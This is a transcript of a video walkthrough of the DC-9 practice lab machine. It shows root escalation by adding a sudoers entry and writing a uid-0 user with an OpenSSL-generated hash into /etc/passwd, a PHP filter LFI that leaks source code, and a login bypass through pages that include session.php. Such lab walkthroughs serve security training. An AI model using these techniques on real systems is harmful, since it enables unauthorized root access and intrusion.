sudo add on etsy sudoers. So now we added that line. If we do sudo dash L, Joey may run the following commands on DC-9, all. So sudo bash, and we are now root. The other easy way to do this is through OpenSSL and adding an entry into the passwd. So OpenSSL passwd, let's dh client eat 0. Sorry about this. I'll figure this out before I can do my next video. OpenSSL passwd, and we want dash salt. So let's see. There we go. Examples. So we can go back to the box. And what this is doing is just generating the password. So let's, for the salt, do please. And for the password, we'll do subscribe. Let's do So it truncated this to 8 characters. 1, 2, 3, 4, 5, 6, 7, 8. So the password is subscribe. So let's add this line to the passwd. Going into temp, let's tail dash 1 passwd to new passwd. And we're going to edit this to be the user ipsec. And this is reserved for password hashes. If it's an X, it's going to go into the shadow file to get a password. So we're just going to put a passwd password here. We could do the shadow file, but that would just make it much more annoying. So ipsec. And I say much more annoying because we'd have to do this twice and add a line to passwd to create the user, then add a line in the shadow file for the user's password. This is just a shortcut. So I'm going to make his home directory slash root. So this is the passwd format: username, password hash, user ID, 0 is root, group ID, 0 is root again, comment or name of the user. This doesn't matter. It can be literally anything. And then the home directory is next. I'm just putting his home directory as root, and then the login shell bin bash. So let's go back to the sudo and we'll do temp new passwd etsy passwd. And now we can do a su-ipsec and type the password. What was it? S-U-B-C-R-I-B, subscribe. And we are now root on this box. So that is how you do DC-9. If you enjoyed this video, let me know in the comments, and that'll be it. So take care. See you all later. Actually, I lied. I'm not done yet. There are two things I wanted to show you. Number one was a unintended thing that we discovered in the live stream doing this box. And the other thing is this LFI and manage.php. So let's go over www.html, look at manage.php, and see where this LFI is. I'm going to search the file for file. And let's see. File is equal to this. So if file exists, file include. So let's see, file currently is contact-info.php. So if that exists, include it. Else, file does not exist. File is equal to get file, include directory slash file. So this is why the PHP filter did not work. So if we edit manage.php and say just include file, so let's go before we edit it, go back to Burp Suite, and we wanted to grab index.php. So we did a PHP filter, convert.base64 encode, index.php, this is resource, is equal to this, and send. We don't get anything, because what a command right now is directory slash that. Since the include statement's not beginning with this wrapper, it's not going to work. So let's cheat a little bit and get rid of the directory piece. Save that, click send, and oh, we're not logged in. So let's copy this PHP session ID. I guess we need to log in real quick. Let's go Firefox, example, manage, admin, transorbital 1. And we will send this to Burp Suite. Repeater. Send, and we have a bunch of base64. So if we go back to this file and do directory slash like it was, send, doesn't work. So this is that piece. And if we decode this, echo-n, base64-d, we get the source code to the script. So if we just tried index.php, we won't be able to see the full source code. Did I leave it on directory? Let's see. No, I did not. I don't know why that's not working, but you can't really use include statements to do that, because if we look at the source, the PHP is going to see this PHP tag and execute it. When you do it in base64, it doesn't see the PHP tag because it's in base64 encoding. So that's why you can extract source with that PHP filter. The second thing is a bug in this website. So when we were doing this box live, and we did GoBuster, GoBuster root.out, we found a few scripts like welcome.php. So let us go and delete this cookie, refresh, delete, and we click on all these things, and we can't do anything. Okay. So if we go to welcome.php and notice the file not found thing's not there, we go to welcome.php, you're already logged in, and we go back to manage, we get the file does not exist. So looking at the code on manage.php, we see right off the bat, it includes config.php and then goes on to do things. So let's look at what config.php is. That is just the file we saw earlier with config stuff. Let's see. Is there any dies in this? There is not. So going back to file, we have, let's see. Right now, I'm just trying to figure out why it's showing. Okay. So we have this is admin. And the session is logged in username here. So when we hit the welcome page, this logged in username thing's being set. So if we go back into our storage cookies and we look at this session. So I think the PHP session is in verlib php sessions, and we cat sess and the session, we see logged in username. So this exists, so that's why we can go down that one code path. Is admin does equal something. If we create a new session and don't hit welcome.php, so let's delete this, hit manage, look at this session, and we cat, whoops, the file, it's empty. But as soon as we hit welcome.php, it populates. So we gotta see what welcome.php does. So less welcome.php. It's going to include session.php. And what we want to do is look for a logged in username here. So this isn't setting anything because this is just saying if the session variable is admin, then display more stuff. And then we have logged in as this. So we don't see it setting this variable name. But the very first thing it does is include session.php. So if we look at session.php and search for logged in, we see it's setting that variable to admin. So starts the session and then sets it to admin, and that's why this script works. So any file that includes session.php will actually log you in, which is hilarious. So let's grep session.php, do a recursive. So log out includes session.php. So if you try to log out of this application, you can't. So let's test that further. Delete a session, go here. We don't have anything. If we hit logout.php, we are now logged in and on manage. So if you didn't do that piece with SQL injection and grabbing the credentials to eventually discover admin transorbital one, this was a bypass of that whole SQL injection piece. Because if you hit the logout.php, welcome.php, or any of those that had session, it would log you into the application and you could proceed straight to doing that LFI. So with that being said, that will be the video. Take care, and I'll see you all later.